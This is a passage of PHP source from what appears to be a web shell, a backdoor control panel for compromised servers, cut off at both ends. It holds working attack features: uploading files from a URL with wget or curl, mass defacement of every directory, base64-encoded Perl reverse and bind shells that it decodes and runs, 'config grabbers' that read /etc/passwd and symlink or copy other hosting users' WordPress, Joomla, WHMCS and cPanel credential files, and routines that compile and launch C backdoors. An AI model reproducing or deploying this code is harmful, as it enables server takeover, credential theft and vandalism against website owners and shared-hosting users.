2212</td></tr></table></form></div></center>
2213<?
2214 }
2215
2216 }
2217
2218/* Uploader */
2219
2220elseif(isset($_REQUEST['upload'])){ $s_result = " "; $msg = "";
2221if(isset($_POST['uploadcomp'])){
2222 if(is_uploaded_file($_FILES['file']['tmp_name'])){
2223 $path = magicboom($_POST['path']);
2224 $fname = $_FILES['file']['name'];
2225 $tmp_name = $_FILES['file']['tmp_name'];
2226 $pindah = $path.$fname;
2227 $stat = @move_uploaded_file($tmp_name,$pindah);
2228 if ($stat) {
2229 $msg = "file uploaded to $pindah";
2230 }
2231 else $msg = "failed to upload $fname";
2232 }
2233 else $msg = "failed to upload $fname";
2234}
2235elseif(isset($_POST['uploadurl'])){
2236 $pilihan = trim($_POST['pilihan']);
2237 $wurl = trim($_POST['wurl']);
2238 $path = magicboom($_POST['path']);
2239 $namafile = download($pilihan,$wurl);
2240 $pindah = $path.$namafile;
2241 if(is_file($pindah)) {
2242 $msg = "file uploaded to $pindah";
2243 }
2244 else $msg = "failed to upload $namafile";
2245
2246}
2247?>
2248<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
2249<table class="tabnet" style="width:320px;padding:0 1px;">
2250<tr><th colspan="2">Upload from computer</th></tr>
2251<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
2252<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2253</tr>
2254</table></form>
2255<table class="tabnet" style="width:320px;padding:0 1px;">
2256<tr><th colspan="2">Upload from url</th></tr>
2257<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
2258<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
2259<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2260<tr><td><select size="1" class="inputz" name="pilihan">
2261<option value="wwget">wget</option>
2262<option value="wlynx">lynx</option>
2263<option value="wfread">fread</option>
2264<option value="wfetch">fetch</option>
2265<option value="wlinks">links</option>
2266<option value="wget">GET</option>
2267<option value="wcurl">curl</option>
2268</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
2269</tr>
2270</table>
2271<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2272
2273<?php }
2274
2275/* Hash */
2276
2277elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
2278 {
2279 ?>
2280 <?php
2281$submit= $_POST['enter'];
2282if (isset($submit)) {
2283$pass = $_POST['password']; // password
2284$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
2285$hash = md5($pass); // md5 hash #1
2286$md4 = hash("md4",$pass);
2287$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
2288$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
2289$hash1 = sha1($pass); // sha1 hash #4
2290$sha256 = hash("sha256",$text);
2291$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
2292$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
2293}
2294echo '<form action="" method="post"><table class="tabnet">';
2295echo '<th colspan="2">Password Hash</th></center></tr>';
2296echo '<td><b>masukan kata yang ingin di encrypt:</b></td>';
2297echo '<td><input class="inputz" type="text" name="password" size="40" />';
2298echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
2299//echo '</td></tr><br>';
2300echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
2301echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr>';
2302echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr>';
2303echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr>';
2304echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr>';
2305echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr>';
2306echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr>';
2307echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr>';
2308echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr>';
2309echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr></table>';
2310}
2311
2312/* Hash ID */
2313
2314elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
2315if(isset($_POST['gethash'])){
2316 $hash = $_POST['hash'];
2317 if(strlen($hash)==32){
2318 $hashresult = "MD5 Hash";
2319 }elseif(strlen($hash)==40){
2320 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
2321 }elseif(strlen($hash)==13){
2322 $hashresult = "DES(Unix) Hash";
2323 }elseif(strlen($hash)==16){
2324 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
2325 }elseif(strlen($hash)==41){
2326 $GetHashChar = substr($hash, 40);
2327 if($GetHashChar == "*"){
2328 $hashresult = "MySQL5 Hash";
2329 }
2330 }elseif(strlen($hash)==64){
2331 $hashresult = "SHA-256 Hash";
2332 }elseif(strlen($hash)==96){
2333 $hashresult = "SHA-384 Hash";
2334 }elseif(strlen($hash)==128){
2335 $hashresult = "SHA-512 Hash";
2336 }elseif(strlen($hash)==34){
2337 if(strstr($hash, '$1$')){
2338 $hashresult = "MD5(Unix) Hash";
2339 }
2340 }elseif(strlen($hash)==37){
2341 if(strstr($hash, '$apr1$')){
2342 $hashresult = "MD5(APR) Hash";
2343 }
2344 }elseif(strlen($hash)==34){
2345 if(strstr($hash, '$H$')){
2346 $hashresult = "MD5(phpBB3) Hash";
2347 }
2348 }elseif(strlen($hash)==34){
2349 if(strstr($hash, '$P$')){
2350 $hashresult = "MD5(Wordpress) Hash";
2351 }
2352 }elseif(strlen($hash)==39){
2353 if(strstr($hash, '$5$')){
2354 $hashresult = "SHA-256(Unix) Hash";
2355 }
2356 }elseif(strlen($hash)==39){
2357 if(strstr($hash, '$6$')){
2358 $hashresult = "SHA-512(Unix) Hash";
2359 }
2360 }elseif(strlen($hash)==24){
2361 if(strstr($hash, '==')){
2362 $hashresult = "MD5(Base-64) Hash";
2363 }
2364 }else{
2365 $hashresult = "Hash type not found";
2366 }
2367 }else{
2368 $hashresult = "Not Hash Entered";
2369 }
2370
2371 ?>
2372 <center>
2373
2374 <form action="" method="POST">
2375 <tr>
2376 <table class="tabnet">
2377 <th colspan="5">Hash Identification</th>
2378 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
2379 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
2380 </table></tr></form>
2381 </center>
2382
2383 <?php
2384
2385}
2386
2387/* Mass Deface */
2388
2389elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2390{
2391echo "<center/><br/><b><font color=white>Mass Deface</font></b>";
2392error_reporting(0);?>
2393<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2394<td><table><table class="tabnet" >
2395<form hethot='post'>
2396<tr>
2397 <tr>
2398 <td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
2399 </tr><br>
2400 <tr>
2401 <td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="del.htm"></td>
2402 </tr>
2403</tr>
2404<th colspan='2'><b>Script Deface</b></th><br></table>
2405<textarea style='background:black;outline:none;color:white;border:1px solid grey;' name='index' rows='10' cols='72'>
2406Hacked By UstadCage_48
2407</textarea><br>
2408<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table></form>
2409<h3>Defaced result: </h3>
2410
2411Textarea Version:<br>
2412<textarea style='background:black;outline:none;color:grey;' name='index' rows='10' cols='72'>
2413<?php $ini="http://";
2414 $mainpath=$_POST[path];
2415 $file=$_POST[file];
2416 $dir=opendir("$mainpath");
2417 $code=base64_encode($_POST[index]);
2418 $indx=base64_decode($code);
2419 while($row=readdir($dir)){
2420 $start=@fopen("$row/$file","w+");
2421 $finish=@fwrite($start,$indx);
2422 if ($finish){echo"$ini$row/$file\n";}}
2423?>
2424</textarea><br><br>
2425Text Version:<br>
2426<?php $ini="http://";
2427 $mainpath=$_POST[path];
2428 $file=$_POST[file];
2429 $dir=opendir("$mainpath");
2430 $code=base64_encode($_POST[index]);
2431 $indx=base64_decode($code);
2432 while($row=readdir($dir)){
2433 $start=@fopen("$row/$file","w+");
2434 $finish=@fwrite($start,$indx);
2435 if ($finish){echo"<a href="."$ini$row/$file"." target="."_blank".">$ini$row/$file</a><br>";}}
2436
2437?>
2438<?php
2439}
2440
2441/* Back Connect */
2442
2443elseif(isset($_GET['x']) && ($_GET['x'] == 'sbc')){ @ini_set('output_buffering',0);
2444?>
2445 <form action="?y=<?php echo $pwd; ?>&x=sbc" method="post">
2446 <br><br><center><b><font size=4>Back Connect Simple</font></b></center><br>
2447<?php
2448echo "
2449<head>
2450<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
2451<form method='POST'>
2452<title>Facebook Brute Force 2014</title>
2453</head>
2454<style>
2455textarea {
2456resize:none;
2457color: #000000 ;
2458border:1px solid red ;
2459border-left: 4px solid red ;
2460}
2461input {
2462color: #000000;
2463border:1px dotted black;
2464}
2465</style>";
2466if ($_REQUEST['cdirname']){
2467if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
2468function bcn($ipbc,$pbc){
2469$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
2470NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
2471MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
2472dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
2473IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
2474YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
2475LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
2476KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
2477KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
2478IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
2479ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
2480$opbc=fopen("bcc.pl","w");
2481fwrite($opbc,base64_decode($bcperl));
2482fclose($opbc);
2483system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2484}
2485function wbp($wb){
2486$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
2487cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
2488a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
2489ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
2490IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
2491IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
2492VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
2493VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
2494$opwb=fopen("wbp.pl","w");
2495fwrite($opwb,base64_decode($wbp));
2496fclose($opwb);
2497echo getcwd();
2498system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2499}
2500function lbp($wb){
2501$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
2502YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
2503U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
2504VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
2505QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
2506dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
2507b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
2508Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
2509$oplb=fopen("lbp.pl","w");
2510fwrite($oplb,base64_decode($lbp));
2511fclose($oplb);
2512system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2513}
2514
2515if($_REQUEST['portbw']){
2516wbp($_REQUEST['portbw']);
2517
2518}if($_REQUEST['portbl']){
2519lbp($_REQUEST['portbl']);
2520}
2521if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
2522bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
2523
2524}
2525echo "<p align='center'><font face='Tahoma' color='#007700' size='2pt' /><p align='center'><br>Ip : <input type=text name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input type=text name=portbc value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'><p align='center'><br><font face='Tahoma' color='#009900' size='2pt'> Windows Bind Port</font> <br>Port : <input type=text name=portbw value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'> <br><font face='Tahoma' color='#009900' size='2pt'>Linux Bind Port</font> <br>Port : <input type=text name=portbl value=5555> <input type=submit value=Connect></form><br><br>".$end;exit;
2526}
2527/////////////////////////////////
2528 /* OPEN GRABBER */
2529/////////////////////////////////
2530elseif(isset($_GET['do']) && ($_GET['do'] == 'grabber')){
2531 ?>
2532 <style>
2533 #jm{
2534 background:#000000;
2535 margin:8px 2px 4px 2px;
2536}
2537#jm a{
2538 padding:2px 7px;
2539 margin:0;
2540 background: #595959 ;
2541 border-bottom: 3px solid #E74C3D;
2542 text-decoration:none;
2543 letter-spacing:2px;
2544 -moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml-border-radius: 3px; border-radius: 3px;
2545
2546}
2547#jm a:hover{
2548 background: #404040 ;
2549 border-bottom: 3px solid #E74C3D;
2550}
2551 </style>
2552 <center>
2553 <div id="jm">
2554 <table><tr><td><p align="left"> Note :<br>
2555 # Grabber v1 Ucage Version<br># Grabber v2 InDoXploiT Version</p>
2556 </td></tr></table>
2557 <br>
2558 <a href="?<?php echo "y=".$pwd; ?>&id=3">Grabber V1</a> <a href="?<?php echo "y=".$pwd; ?>&id=4">Grabber V2</a>
2559 </div>
2560 </center>
2561 <?php
2562 }
2563
2564
2565/////////////////////////////////
2566 /* GRABBER HIJI*/
2567/////////////////////////////////
2568elseif(isset($_GET['id']) && ($_GET['id'] == '3')){ @ini_set('output_buffering',0);
2569?>
2570 <form action="?y=<?php echo $pwd; ?>&x=grabc" method="post">
2571 <br><center><b><font size=4>Config Grabber !</font></b></center>
2572<?php
2573echo "
2574<form method='POST'>
2575</head>
2576<style>
2577textarea {
2578resize:none;
2579color: #fff ;
2580background-color:#000000;
2581font-size:8pt; color:#FFFF00;
2582border:1px solid grey ;
2583border-left: 4px solid grey ;
2584width:543px;
2585height:400px;
2586}
2587input {
2588color: #fff;
2589border:1px solid grey;
2590}
2591</style>";
2592echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('ucage', 0755);@chdir('ucage');
2593$htaccess="
2594OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2595Options Indexes FollowSymLinks
2596ForceType text/plain
2597AddType text/plain .php
2598AddType text/plain .html
2599AddType text/html .shtml
2600AddType txt .php
2601AddHandler server-parsed .php
2602AddHandler txt .php
2603AddHandler txt .html
2604AddHandler txt .shtml
2605Options All
2606Options All";
2607file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2608$passwd=explode("\n",$passwd);
2609echo "<center><font color=#b0b000 size=2pt>Waiting ...</center><br>";
2610foreach($passwd as $pwd){
2611$pawd=explode(":",$pwd);$user =$pawd[0];
2612@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2613@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2614@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2615@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2616@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2617@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2618@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2619@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2620@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2621@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2622@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2623@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2624@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2625@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2626@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2627@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2628@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2629@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2630@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2631@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2632@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2633@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2634@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2635@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2636@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2637@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2638@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2639@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2640@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2641@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2642@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2643@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2644@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2645@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2646@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2647@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2648@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2649@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2650@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2651@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2652echo '<b class="cone"><font color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="ucage">Open Configs</a></font></b>';}
2653}
2654/////////////////////////////////
2655 /* GRABBER DUA*/
2656/////////////////////////////////
2657elseif(isset($_GET['id']) && ($_GET['id'] == '4'))
2658 {
2659 /* indoxploit */
2660
2661 $etc = fopen("/etc/passwd", "r");
2662 $idx = mkdir("idx_config", 0777);
2663 $isi_htc = "Options all\nRequire None\nSatisfy Any";
2664 $htc = fopen("idx_config/.htaccess","w");
2665 fwrite($htc, $isi_htc);
2666 while($passwd = fgets($etc)) {
2667 if($passwd == "" || !$etc) {
2668 echo "<br><font color=red>Can't read /etc/passwd</font>";
2669 } else {
2670 preg_match_all('/(.*?):x:/', $passwd, $user_config);
2671 foreach($user_config[1] as $user_idx) {
2672 $user_config_dir = "/home/$user_idx/public_html/";
2673 if(is_readable($user_config_dir)) {
2674 $grab_config = array(
2675 "/home/$user_idx/.my.cnf" => "cpanel",
2676 "/home/$user_idx/.accesshash" => "WHM-accesshash",
2677 "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
2678 "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
2679 "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2680 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
2681 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
2682 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
2683 "/home/$user_idx/public_html/forum/config.php" => "phpBB",
2684 "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
2685 "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
2686 "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
2687 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
2688 "/home/$user_idx/public_html/configuration.php" => "Joomla",
2689 "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
2690 "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
2691 "/home/$user_idx/public_html/wp-config.php" => "WordPress",
2692 "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
2693 "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
2694 "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
2695 foreach($grab_config as $config => $nama_config) {
2696 $ambil_config = file_get_contents($config);
2697 if($ambil_config == ') {
2698 } else {
2699 $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
2700 fputs($file_config,$ambil_config);
2701 }
2702 }
2703 }
2704 }
2705 }
2706 }
2707 echo "<br><center>Done => <a href='?y=$pwd/idx_config'><font color=lime>Klik Here</font></a></center>";
2708
2709 ?>
2710
2711<?php
2712}
2713
2714/* Uploader */
2715
2716elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
2717if(isset($_POST['uploadcomp'])){
2718 if(is_uploaded_file($_FILES['file']['tmp_name'])){
2719 $path = magicboom($_POST['path']);
2720 $fname = $_FILES['file']['name'];
2721 $tmp_name = $_FILES['file']['tmp_name'];
2722 $pindah = $path.$fname;
2723 $stat = @move_uploaded_file($tmp_name,$pindah);
2724 if ($stat) {
2725 $msg = "file uploaded to $pindah";
2726 }
2727 else $msg = "failed to upload $fname";
2728 }
2729 else $msg = "failed to upload $fname";
2730}
2731elseif(isset($_POST['uploadurl'])){
2732 $pilihan = trim($_POST['pilihan']);
2733 $wurl = trim($_POST['wurl']);
2734 $path = magicboom($_POST['path']);
2735 $namafile = download($pilihan,$wurl);
2736 $pindah = $path.$namafile;
2737 if(is_file($pindah)) {
2738 $msg = "file uploaded to $pindah";
2739 }
2740 else $msg = "failed to upload $namafile";
2741
2742}
2743?>
2744<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
2745<table class="tabnet" style="width:320px;padding:0 1px;">
2746<tr><th colspan="2">Upload from computer</th></tr>
2747<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
2748<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2749</tr>
2750</table></form>
2751<table class="tabnet" style="width:320px;padding:0 1px;">
2752<tr><th colspan="2">Upload from url</th></tr>
2753<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
2754<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
2755<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2756<tr><td><select size="1" class="inputz" name="pilihan">
2757<option value="wwget">wget</option>
2758<option value="wlynx">lynx</option>
2759<option value="wfread">fread</option>
2760<option value="wfetch">fetch</option>
2761<option value="wlinks">links</option>
2762<option value="wget">GET</option>
2763<option value="wcurl">curl</option>
2764</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
2765</tr>
2766</table>
2767<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2768
2769<?php }
2770
2771/* Netsploit */
2772
2773elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
2774
2775// bind connect with c
2776if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
2777 $port = trim($_POST['port']);
2778 $passwrd = trim($_POST['bind_pass']);
2779 tulis("bdc.c",$port_bind_bd_c);
2780 exe("gcc -o bdc bdc.c");
2781 exe("chmod 777 bdc");
2782 @unlink("bdc.c");
2783 exe("./bdc ".$port." ".$passwrd." &");
2784 $scan = exe("ps aux");
2785 if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
2786 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
2787}
2788// bind connect with perl
2789elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
2790 $port = trim($_POST['port']);
2791 $passwrd = trim($_POST['bind_pass']);
2792 tulis("bdp",$port_bind_bd_pl);
2793 exe("chmod 777 bdp");
2794 $p2=which("perl");
2795 exe($p2." bdp ".$port." &");
2796 $scan = exe("ps aux");
2797 if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
2798 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
2799}
2800// back connect with c
2801elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
2802 $ip = trim($_POST['ip']);
2803 $port = trim($_POST['backport']);
2804 tulis("bcc.c",$back_connect_c);
2805 exe("gcc -o bcc bcc.c");
2806 exe("chmod 777 bcc");
2807 @unlink("bcc.c");
2808 exe("./bcc ".$ip." ".$port." &");
2809 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2810}
2811// back connect with perl
2812elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
2813 $ip = trim($_POST['ip']);
2814 $port = trim($_POST['backport']);
2815 tulis("bcp",$back_connect);
2816 exe("chmod +x bcp");
2817 $p2=which("perl");
2818 exe($p2." bcp ".$ip." ".$port." &");
